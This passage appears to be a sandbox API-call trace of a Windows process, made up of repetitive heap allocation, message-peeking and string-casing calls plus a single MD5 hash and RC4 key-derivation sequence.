Size=0x8) returned 0x24b1c38 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.594] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.594] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0267.595] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0267.595] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.596] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.596] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.596] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0267.597] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0267.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.598] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.598] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.598] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.598] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.598] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.598] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.598] CryptHashData (hHash=0xaa58a0, pbData=0x24b1828, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.599] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.599] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.599] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.599] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.599] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.599] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.599] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.599] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.599] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.599] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.599] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0267.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.609] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.609] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.609] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.610] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.610] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 